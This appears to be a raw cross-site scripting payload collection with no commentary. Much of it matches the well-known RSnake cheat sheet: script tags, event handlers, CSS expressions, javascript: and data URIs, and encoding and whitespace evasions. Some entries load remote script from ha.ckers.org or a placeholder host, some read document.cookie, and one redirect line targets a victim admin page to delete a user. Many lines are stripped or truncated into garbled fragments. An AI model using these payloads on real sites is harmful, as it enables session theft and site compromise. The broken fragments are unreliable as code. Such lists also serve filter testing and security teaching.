window.alert("Bonjour !");
onload=alert('XSS')>
">
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')
'">>XSS
var var = 1; alert(var)
BODY{background:url("javascript:alert('XSS')")}
='alert("XSS")'?>
![]()
" onfocus=alert(document.domain) "> <"
li {list-style-image: url(\"javascript:alert('XSS')\");}
- XSS
perl -e 'print \"alert(\"XSS\")\";' > out
perl -e 'print \"\";' > out
alert(1)
alert(1)
">
[color=red width=expression(alert(123))][color]
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
">alert(123)
'">alert(1111)
'">alert(document.cookie)
'""> alert('X \nS \nS');
<<<<>>>><<<script>alert(123)
(123)(123)
'>alert(123)
'>">
}a=eval;b=alert;a(b(/XSS/.source));
document.write("XSS");
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='>alert("xss")
"+src="http://yoursite.com/xss.js?69,69">
alert(navigator.userAgent)>
">/XaDoS/>alert(document.cookie)
">/KinG-InFeT.NeT/>alert(document.cookie)
src="http://www.site.com/XSS.js">
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--" />alert('xss');
alert("XSS by \nxss")
XSS by xss
">alert("XSS by \nxss")>XSS by xss
'">alert("XSS by \nxss")>XSS by xss
![]()
alert("XSS by \nxss")XSS by xss
alert(1337)XSS by xss
">alert(1337)">alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1337)>XSS by xss
XSS by xss
'>alert(String.fromCharCode(88,83,83))![<br />"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
<br />\]()
alert(String.fromCharCode(88,83,83))![\']()
alert(String.fromCharCode(88,83,83));
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B
alert(“XSS”);
![]()
![]()
![]()
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<!--[if gte IE 4]>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<BR SIZE="&{alert('XSS')}">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IMG SRC=javascript:alert('XSS')>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt p://6	6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
document.vulnerable=true;
![]()
![]()
![]()
<document.vulnerable=true;//<
document.vulnerable=true;
![]()
document.vulnerable=true;
![]()
![]()
li {list-style-image: url("javascript:document.vulnerable=true;");
- XSS
![]()
1script3document.vulnerable=true;1/script3
@im\port'\ja\vasc\ript:document.vulnerable=true';
![]()
exp/*
document.vulnerable=true;
.XSS{background-image:url("javascript:document.vulnerable=true");}
BODY{background:url("javascript:document.vulnerable=true")}
]]
echo('document.vulnerable=true'); ?>